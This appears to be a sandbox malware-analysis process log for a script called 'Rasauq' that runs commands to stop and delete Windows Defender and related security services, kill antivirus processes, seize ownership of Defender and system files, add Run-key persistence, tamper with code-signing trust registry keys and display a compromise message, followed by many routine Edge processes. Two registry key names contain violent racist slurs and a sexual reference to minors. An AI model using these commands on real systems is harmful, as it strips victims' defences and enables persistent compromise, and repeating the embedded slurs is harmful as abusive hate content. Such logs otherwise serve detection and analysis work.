C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1 /f4⤵PID:1400
-
-
C:\Windows\system32\sc.exesc stop WinDefend4⤵
- Launches sc.exe
PID:3808
-
-
C:\Windows\system32\sc.exesc delete WinDefend4⤵PID:4500
-
-
C:\Windows\system32\sc.exesc stop SecurityHealthService4⤵
- Launches sc.exe
PID:3004
-
-
C:\Windows\system32\sc.exesc delete SecurityHealthService4⤵PID:416
-
-
C:\Windows\system32\sc.exesc stop Sense4⤵
- Launches sc.exe
PID:2976
-
-
C:\Windows\system32\sc.exesc delete Sense4⤵
- Launches sc.exe
PID:1656
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MsMpEng.exe /T4⤵
- Kills process with taskkill
PID:5212
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM MpCmdRun.exe /T4⤵
- Kills process with taskkill
PID:2468
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM SecurityHealthSystray.exe /T4⤵
- Kills process with taskkill
PID:4168
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM smartscreen.exe /T4⤵
- Kills process with taskkill
PID:1680
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5284
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3328
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\Program Files\Windows Defender" /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3764
-
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Windows Defender" /grant Administrators:F /t /c /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3916
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f4⤵PID:2824
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinDefend" /f4⤵
- Modifies security service
PID:3480
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /f4⤵PID:1976
-
-
C:\Windows\system32\reg.exereg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense" /f4⤵PID:5716
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\notepad.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:6092
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\notepad.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5692
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\calc.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5512
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\calc.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4932
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\Taskmgr.exe /a /r /d y4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\Taskmgr.exe /grant Administrators:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2648
-
-
C:\Windows\system32\powercfg.exepowercfg /hibernate off REM Disables hibernation4⤵
- Power Settings
PID:4128
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevents sleep while plugged in4⤵
- Power Settings
PID:3936
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-dc 0 REM Prevents sleep on battery4⤵
- Power Settings
PID:308
-
-
C:\Windows\system32\powercfg.exepowercfg /change standby-timeout-ac 0 REM Prevent sleep when plugged in4⤵
- Power Settings
PID:3024
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "Device Name"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:5368
-
-
C:\Windows\system32\powercfg.exepowercfg /devicedisablewake "USB Root Hub"4⤵
- Power Settings
- Checks SCSI registry key(s)
PID:5944
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Service" /t REG_SZ /d "" /f4⤵
- Adds Run key to start application
PID:5356
-
-
C:\Windows\system32\reg.exereg add "HKCR\behead all niggers" /f4⤵
- Modifies registry class
PID:4332
-
-
C:\Windows\system32\reg.exereg add "HKCC\SOFTWARE\hello today guys i will be killing all the niggas while warching loli" /f4⤵PID:1672
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "LetsRemoveRasauq"4⤵PID:2312
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "RasauqRemover" /t REG_SZ /d "\"\"" /f4⤵
- Adds Run key to start application
PID:2972
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKU" /s /f "Software" /k4⤵PID:4024
-
C:\Windows\system32\reg.exereg query "HKU" /s /f "Software" /k5⤵PID:4496
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:560
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:3780
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:3504
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:1156
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:5648
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:2940
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:3180
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:468
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Software\Rasauq on top" /f4⤵PID:4236
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\AppDataLow\Software\Software\Rasauq on top" /f4⤵PID:2616
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵PID:2400
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Speech_OneCore\Isolated\hI8XsvMZLfGME4pGvcu5ybXE8iojEgqtSsGWO-tcVAk\HKEY_CURRENT_USER\SOFTWARE\Software\Rasauq on top" /f4⤵PID:5624
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
PID:5492
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:5500
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:3736
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:2308
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:3800
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:3628
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-21-2123103809-19148277-2527443841-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top" /f4⤵
- Modifies registry class
PID:5372
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Software\Rasauq on top" /f4⤵PID:5964
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Classes\Local Settings\Software\Software\Rasauq on top" /f4⤵
- Modifies data under HKEY_USERS
PID:2732
-
-
C:\Windows\system32\reg.exereg add "HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing\Software\Rasauq on top" /f4⤵
- Manipulates Digital Signatures
- Modifies data under HKEY_USERS
PID:1052
-
-
C:\Windows\system32\reg.exereg add "End of search: 22 match(es) found.\Software\Rasauq on top" /f4⤵PID:6048
-
-
C:\Windows\system32\msg.exemsg * /time:3 "This machine has been compromised by Rasuaq"4⤵PID:3028
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=17424670400714⤵PID:4436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument https://cdn-cf-east.streamable.com/video/mp4/j3mt4w.mp4?Expires=17424670400715⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:3772 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x260,0x264,0x268,0x25c,0x288,0x7fffa6acf208,0x7fffa6acf214,0x7fffa6acf2206⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:2132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:36⤵PID:4092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2192,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:26⤵PID:3916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2540,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:86⤵PID:3604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=3516 /prefetch:16⤵PID:3472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:16⤵PID:3448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4932,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=4920 /prefetch:16⤵PID:3936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5124 /prefetch:86⤵PID:6116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5100,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5160 /prefetch:86⤵PID:2904
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5744,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5732 /prefetch:86⤵PID:3660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6048,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:86⤵PID:572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6048,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:86⤵PID:5864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=6392,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:16⤵PID:5680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6484,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6292 /prefetch:16⤵PID:1556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=6608,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6480 /prefetch:16⤵PID:2528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6280,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6656 /prefetch:16⤵PID:5240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6488,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:16⤵PID:2984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=7072,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7100 /prefetch:16⤵PID:5056
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=7368,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7336 /prefetch:16⤵PID:1768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=7364,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7252 /prefetch:16⤵PID:1092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7732,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7760 /prefetch:86⤵PID:4436
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7740,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=600 /prefetch:86⤵PID:5408
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7748,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7712 /prefetch:86⤵PID:1800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=7272,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7628 /prefetch:16⤵PID:760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7280,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:16⤵PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --always-read-main-dll --field-trial-handle=3476,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5168 /prefetch:16⤵PID:5948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=7992,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:16⤵PID:2800
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=5972,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:16⤵PID:2512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=5388,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5352 /prefetch:16⤵PID:2324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=8360,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=8352 /prefetch:16⤵PID:2044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=8520,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=8556 /prefetch:16⤵PID:300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8740,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=8752 /prefetch:86⤵PID:3860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=8924,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=5360 /prefetch:16⤵PID:1316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=9096,i,18135389198667678560,5132327275903547206,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:16⤵PID:608
-
-
